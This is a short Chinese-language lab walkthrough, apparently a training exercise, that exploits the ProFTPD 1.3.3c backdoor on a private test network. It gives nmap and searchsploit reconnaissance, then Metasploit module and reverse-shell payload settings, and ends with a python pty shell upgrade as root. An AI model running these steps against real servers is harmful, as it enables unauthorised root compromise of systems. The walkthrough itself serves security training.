FTP服务后门利用
扫描端口及漏洞
攻击机ip:192.168.88.129
靶机ip: 192.168.88.130
- nmap -sV 扫描端口
- searchsploit ProFTPD 1.3.3c
这节主要介绍ftp端口。使用searchsploit来查看该版本的ftp服务有没有可利用的漏洞。
searchsploit ProFTPD 1.3.3c
- msfconsole打开metasploit
msf扫描和漏洞利用
- search ProFTPd-1.3.3c
查看对应漏洞
search ProFTPd-1.3.3c
- use exploit/unix/ftp/proftpd_133c_backdoor
使用漏洞
use exploit/unix/ftp/proftpd_133c_backdoor
- show payloads
查看可以使用的payload
show payloads
- set payloads cmd/unix/reverse
设置使用的payload
set payloads cmd/unix/reverse
- show options
查看还有哪些需要设置的内容:
show options
可以看到,RHOSTS和lhost还没有设置,也就是靶机的ip还没有设置。进行设置:
set rhosts 192.168.88.130
set lhost 192.168.88.129
然后重新通过show options查看,可以发现require为yes的都已经填上了,设置完成。
- exploit
exploit执行漏洞,输入id发现是root用户:
- python -c "import pty;pty.spawn(’/bin/bash’)"
python -c “import pty;pty.spawn(’/bin/bash’)”
美化界面
至此获得了控制权